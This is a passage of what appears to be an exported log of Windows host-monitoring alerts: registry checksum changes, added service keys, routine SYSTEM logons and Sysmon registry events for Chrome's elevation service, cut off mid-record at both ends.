md5sum is : '8ac497b048ccef73c4ecb361aa3ffac8' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'a57ddc3084097c99fcffcfb1e624035b13112910' +", +"Apr 24, 2020 @ 10:28:14.912",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '963ffd284ab17477c4d656c4f2614c4f' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'c0ea9cb87fbded9044c0d4731c687543eb23962a' +", +"Apr 24, 2020 @ 10:28:14.436",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:28:14.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:28:14.193",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:28:13.164",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 10:28:11.663",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : '330657157ba5cc04171b1c1a81722e90' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : 'acb2fba9bf89d2a3d54e7e057478f4c44fa08b81' +", +"Apr 24, 2020 @ 10:28:07.789",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 10:28:06.915",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 10:28:06.226",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:28:03.912026900Z"",""eventRecordID"":""921"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:28:03.899\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath\r\nDetails: \""C:\\Program Files (x86)\\Google\\Chrome\\Application\\81.0.4044.122\\elevation_service.exe\""\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:28:03.899"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\ImagePath"",""details"":""\\\""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\81.0.4044.122\\\\elevation_service.exe\\\""""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:28:03.899 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath +Details: ""C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\elevation_service.exe""""" +"Apr 24, 2020 @ 10:28:06.211",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:28:03.911809700Z"",""eventRecordID"":""920"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:28:03.899\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:28:03.899"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\GoogleChromeElevationService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:28:03.899 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:28:05.189",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 10:28:05.184",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 24, 2020 @ 10:28:02.587",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:25:00Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:28:00.635",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 10:27:58.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:58.465",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:57.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:57.964",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:53.996",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:53.980",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:53.417",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 10:27:51.372",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '994c45f15282cc5a92f237967d96fef5' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '88530f962585446daf77f46e080d8b08c8e98a2c' +", +"Apr 24, 2020 @ 10:27:49.809",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '4eb2a07540b08107a0625ee3e4611bbc' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '343b58bbd290264a88f73a3bbfdb8c0877c5bb8e' +", +"Apr 24, 2020 @ 10:27:48.622",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'fcd2bde063d08e3e493bd9b171932f62' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '0154114214c1947389b713ef77c27205b797facc' +", +"Apr 24, 2020 @ 10:27:48.502",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:48.496",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 10:27:48.468",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:44.455",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : 'a836bd80394300540414e863397687ad' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '10c4d918d67affeb805f43db3431644b1b028a63' +", +"Apr 24, 2020 @ 10:27:43.081",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '735c3ab6e8ca71e23614002bbb028249' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : 'd5a88f2cb188c5047330cafcb78ced9235190617' +", +"Apr 24, 2020 @ 10:27:40.408",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '27f0b0536743e3de8fcd99c86a2544f2' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '735e4f181b67d19525042b6d7dd870ffedcd3c0c' +", +"Apr 24, 2020 @ 10:27:39.767",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : 'e72eae0fec329e0227c0acc6aad332c2' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '2b49b1970c5bb2cfdd9508be50951510ea0093de' +", +"Apr 24, 2020 @ 10:27:38.656",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 10:27:34.144",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:27:29.269",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : '7fc797b070d280459f0f0868feba447f' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : '9d42eab457bdc2cad562af5e5592589017817080' +", +"Apr 24, 2020 @ 10:27:23.115",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : '06c8ea1070e2b835ca012b5cda7256cf' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '565d2cad6cc817059329e58613803ea2e1c50563' +", +"Apr 24, 2020 @ 10:27:21.651",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:21.634",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:21.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:21.538",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:21.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:21.242",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.632",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:20.601",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.481",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:20.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:20.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '544514e57047c2570309981465630650' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +", +"Apr 24, 2020 @ 10:27:19.397",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 10:27:18.913",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:18.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:18.742",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:18.727",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:18.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:18.636",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:16.430",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:16.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 10:27:16.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 10:27:16.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 10:27:16.369",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 10:27:16.352",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 10:27:16.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:15.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:15.196",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:14.964",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : 'e0fb41b6c9ef5abaa572c1ef6afa603d' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : '0c93b761e97e5159ee7fbe552b27ab84daa6889c' +", +"Apr 24, 2020 @ 10:27:14.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1c4e04d793df8bd371434698d7441beb' +New md5sum is : '164ddf65a0229b0a5673d9643fd360a5' +Old sha1sum was: '445eb561728c2ed4b3dc1e1f8173bdf8acae870c' +New sha1sum is : 'abc03ba9189e8ab0e57d2f28ac2a9479d27eb1de' +", +"Apr 24, 2020 @ 10:27:14.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +", +"Apr 24, 2020 @ 10:27:12.369",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:12.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:26:55.914",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:24:54Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:26:45.680",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:26:30.849",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:26:07.225",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: 'b40de87500ee3eed90c2ce3ce8c7946f' +New md5sum is : '9d15aff4d26f802c3c4d3d74a00d8d4d' +Old sha1sum was: '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +New sha1sum is : '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +", +"Apr 24, 2020 @ 10:25:55.519",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 10:25:55.485",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 